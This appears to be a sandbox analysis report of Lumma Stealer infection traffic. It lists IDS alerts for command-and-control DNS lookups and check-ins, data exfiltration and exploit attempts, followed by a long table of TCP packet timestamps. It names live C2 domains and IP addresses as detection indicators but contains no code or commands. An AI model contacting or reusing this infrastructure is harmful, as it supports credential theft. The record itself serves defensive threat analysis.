Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-14T08:08:18.652472+0100	2800029	ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass	1	147.45.44.131	80	192.168.2.5	49704	TCP
2024-11-14T08:08:20.850724+0100	2057410	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (netwrokenb .cyou)	1	192.168.2.5	63925	1.1.1.1	53	UDP
2024-11-14T08:08:21.526630+0100	2057411	ET MALWARE Observed Win32/Lumma Stealer Related Domain (netwrokenb .cyou in TLS SNI)	1	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:21.526630+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:22.073793+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:22.073793+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:22.079251+0100	2057346	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs)	1	192.168.2.5	51047	1.1.1.1	53	UDP
2024-11-14T08:08:22.103876+0100	2057354	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs)	1	192.168.2.5	62596	1.1.1.1	53	UDP
2024-11-14T08:08:22.150149+0100	2057338	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs)	1	192.168.2.5	53035	1.1.1.1	53	UDP
2024-11-14T08:08:22.173799+0100	2057340	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs)	1	192.168.2.5	55432	1.1.1.1	53	UDP
2024-11-14T08:08:22.197367+0100	2057334	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs)	1	192.168.2.5	49300	1.1.1.1	53	UDP
2024-11-14T08:08:22.224280+0100	2057348	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs)	1	192.168.2.5	55898	1.1.1.1	53	UDP
2024-11-14T08:08:22.258707+0100	2057344	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs)	1	192.168.2.5	52893	1.1.1.1	53	UDP
2024-11-14T08:08:22.309758+0100	2057350	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs)	1	192.168.2.5	51358	1.1.1.1	53	UDP
2024-11-14T08:08:23.248794+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.102.49.254	443	TCP
2024-11-14T08:08:23.854551+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49706	104.102.49.254	443	TCP
2024-11-14T08:08:23.976547+0100	2057415	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)	1	192.168.2.5	49466	1.1.1.1	53	UDP
2024-11-14T08:08:24.766719+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:24.766719+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:25.512984+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:25.512984+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:26.182744+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:26.182744+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:26.697121+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:26.697121+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:27.485559+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49709	188.114.96.3	443	TCP
2024-11-14T08:08:27.485559+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	188.114.96.3	443	TCP
2024-11-14T08:08:28.661337+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-14T08:08:28.661337+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-14T08:08:29.329609+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-14T08:08:30.074954+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49711	188.114.96.3	443	TCP
2024-11-14T08:08:30.074954+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	188.114.96.3	443	TCP
2024-11-14T08:08:31.420994+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49712	188.114.96.3	443	TCP
2024-11-14T08:08:31.420994+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	188.114.96.3	443	TCP
2024-11-14T08:08:32.961765+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49713	188.114.96.3	443	TCP
2024-11-14T08:08:32.961765+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	188.114.96.3	443	TCP
2024-11-14T08:08:36.008106+0100	2057416	ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)	1	192.168.2.5	49715	188.114.96.3	443	TCP
2024-11-14T08:08:36.008106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	188.114.96.3	443	TCP
2024-11-14T08:08:36.490906+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49715	188.114.96.3	443	TCP
2024-11-14T08:08:37.356363+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49714	TCP
2024-11-14T08:09:16.237232+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49912	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 08:08:17.686361074 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:17.691450119 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:17.691767931 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:17.691899061 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:17.696815968 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529835939 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529863119 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529874086 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529891014 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529896975 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529912949 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.529972076 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.530081987 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.530200958 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.530220985 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.530236959 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.530287027 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.530478001 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.530524969 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.535059929 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.535115957 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.535145998 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.535172939 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.580349922 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.651772976 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.651865005 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.651921988 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.651937962 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.651968002 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652004004 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.652004957 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652115107 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652149916 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652189016 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.652399063 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652432919 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652437925 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.652472019 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.652520895 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.653006077 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.653042078 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.653078079 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.653088093 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.705344915 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.768527985 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768654108 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768663883 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768735886 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768748045 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768762112 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.768790960 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.768937111 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768949032 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.768970013 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.769458055 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.769504070 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.769530058 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.769541025 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.769578934 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.769843102 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.769854069 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.769897938 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.773344040 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.773372889 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.773425102 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.773494959 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.773583889 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.773627996 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.885489941 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.885535002 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.885546923 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.885596037 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.885694027 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.885706902 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.885739088 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.885909081 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.885951042 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.885991096 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.886002064 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.886068106 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.886212111 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.886286020 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.886296988 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.886322021 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.890328884 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.890372038 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.890384912 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.890389919 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.890433073 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:18.890544891 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:18.939703941 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.002540112 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002559900 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002573967 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002593040 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002639055 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002640009 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.002651930 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002710104 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.002882004 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002896070 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.002948046 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.003601074 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.003715038 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.003726006 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.003761053 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.007138014 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.007211924 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.007220984 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.007272005 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.007318020 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.007371902 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.007383108 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.007494926 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.007574081 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.049067974 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.119230986 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119277000 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119287968 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119301081 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119395018 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.119524002 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119610071 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119622946 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119735003 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.119818926 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119829893 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.119858027 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.120429039 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.120474100 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.124084949 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.124178886 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.124190092 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.124218941 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.124236107 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.124248981 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.124259949 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.124284029 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.124308109 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.124805927 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.125215054 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.125269890 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.236382961 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.236416101 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.236428976 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.236521959 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.236578941 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.236613035 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.236659050 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.236665964 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.236711025 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.237317085 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.237409115 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.237415075 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.237459898 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.237593889 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.237658978 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.237682104 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.237739086 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.237785101 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.241281986 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.241307020 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.241314888 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.241388083 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.241543055 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.241555929 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.241610050 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.293385029 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.293828964 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.293934107 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.353476048 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.353507042 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.353518009 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.353598118 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.353702068 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.353708982 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.353758097 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.353923082 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.353980064 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.354022980 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.354027987 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.354068041 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.357862949 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.357928038 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.357939005 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.357995033 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.358131886 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.358139038 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.358186960 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.358283997 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.358374119 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.358419895 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.358454943 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.358494997 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.358549118 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.449304104 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.449316978 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.449548960 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.470647097 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.470659971 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.470674992 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.470733881 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.470741987 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.470793962 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.470794916 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.470896006 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.471024036 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.471029043 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.471045971 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.471086979 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.471193075 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.471244097 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.471287012 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.474704027 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.474771023 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.474781990 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.474845886 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.474982023 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.475064039 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.475075006 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.475106955 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.475234032 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.475240946 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.475281954 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.587332010 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587430954 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587440014 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587498903 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.587512016 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587594986 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587654114 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.587675095 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587824106 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587830067 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.587853909 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.587888002 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.592176914 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592202902 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592209101 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592278004 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.592375040 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592452049 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592500925 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.592556953 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592641115 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.592645884 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592653036 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592794895 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.592809916 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592816114 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.592855930 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.593483925 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.642853022 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.704227924 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704252005 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704266071 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704282999 CET	80	49704	147.45.44.131	192.168.2.5
